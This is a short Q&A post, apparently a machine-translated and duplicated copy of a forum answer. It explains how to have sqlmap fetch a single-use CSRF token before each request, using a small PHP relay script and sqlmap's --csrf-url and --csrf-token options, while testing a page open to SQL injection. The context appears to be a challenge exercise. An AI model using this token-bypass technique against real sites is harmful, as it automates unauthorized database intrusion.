sqlmap - 在每个请求中添加一个动态令牌
sqlmap - add a dynamic token at each request
我正在挑战一个允许 sql 注入的网页。
每个提交的请求都需要一个令牌,您可以从另一个网页检索该令牌。令牌限时有效,仅限一次请求。
有没有办法在每次测试之前告诉 sqlmap 使用自定义脚本获取令牌?
韩国、丹麦
解决了创建自定义 php 页面的问题,该页面从 站点获取令牌 对其进行操作并以 sqlmap 格式提供。假设 token-generator.php 只回复纯文本字符串:
# bypass-csrf.php
<?php
$t = file_get_contents('http://_site_/token-generator.php');
echo '<input type="hidden" name="token" value="' . $t . '">';
echo $t;
?>
sqlmap 参数:--csrf-url="http://127.0.0.1/bypass-csrf.php" --csrf-token="token"
dk
我正在挑战一个允许 sql 注入的网页。 每个提交的请求都需要一个令牌,您可以从另一个网页检索该令牌。令牌限时有效,仅限一次请求。
有没有办法在每次测试之前告诉 sqlmap 使用自定义脚本获取令牌?
韩国、丹麦
解决了创建自定义 php 页面的问题,该页面从 站点获取令牌 对其进行操作并以 sqlmap 格式提供。假设 token-generator.php 只回复纯文本字符串:
# bypass-csrf.php
<?php
$t = file_get_contents('http://_site_/token-generator.php');
echo '<input type="hidden" name="token" value="' . $t . '">';
echo $t;
?>
sqlmap 参数:--csrf-url="http://127.0.0.1/bypass-csrf.php" --csrf-token="token"
dk